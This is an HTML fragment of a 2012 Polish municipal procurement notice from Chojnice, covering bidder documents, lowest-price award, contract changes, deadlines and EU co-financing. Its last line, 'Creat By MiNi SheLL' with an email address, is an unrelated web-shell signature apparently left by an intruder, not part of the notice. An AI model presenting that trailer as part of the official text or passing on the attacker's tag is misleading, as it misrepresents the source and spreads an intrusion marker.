<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonania zmiany postanowień umowy w zakresie: 
a) aktualizacji danych Wykonawcy i Zamawiającego poprzez: zmianę nazwy firmy, zmianę adresu siedziby, zmianę formy prawnej itp. 
b) terminu realizacji, w szczególności spowodowanego zmianami niezależnymi od Wykonawcy lub Zamawiającego 
c) zmiany powszechnie obowiązujących przepisów prawnych;
2. Wszelkie zmiany i uzupełnienia treści niniejszej umowy, z wyjątkiem określonych w pkt. 1, wymagają zgody obu stron, wyrażonej na piśmie w formie aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.miastochojnice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Chojnicach
ul. Stary Rynek 1
89-600 Chojnice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2012 godzina 10:00, miejsce: Urząd Miejski w Chojnicach - Biuro podawcze
ul. Stary Rynek 1
89-600 Chojnice.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Nauka jest dla wszystkich, w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego, umowa nr UDA-POKL.09.01.02-22-316-11-00.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com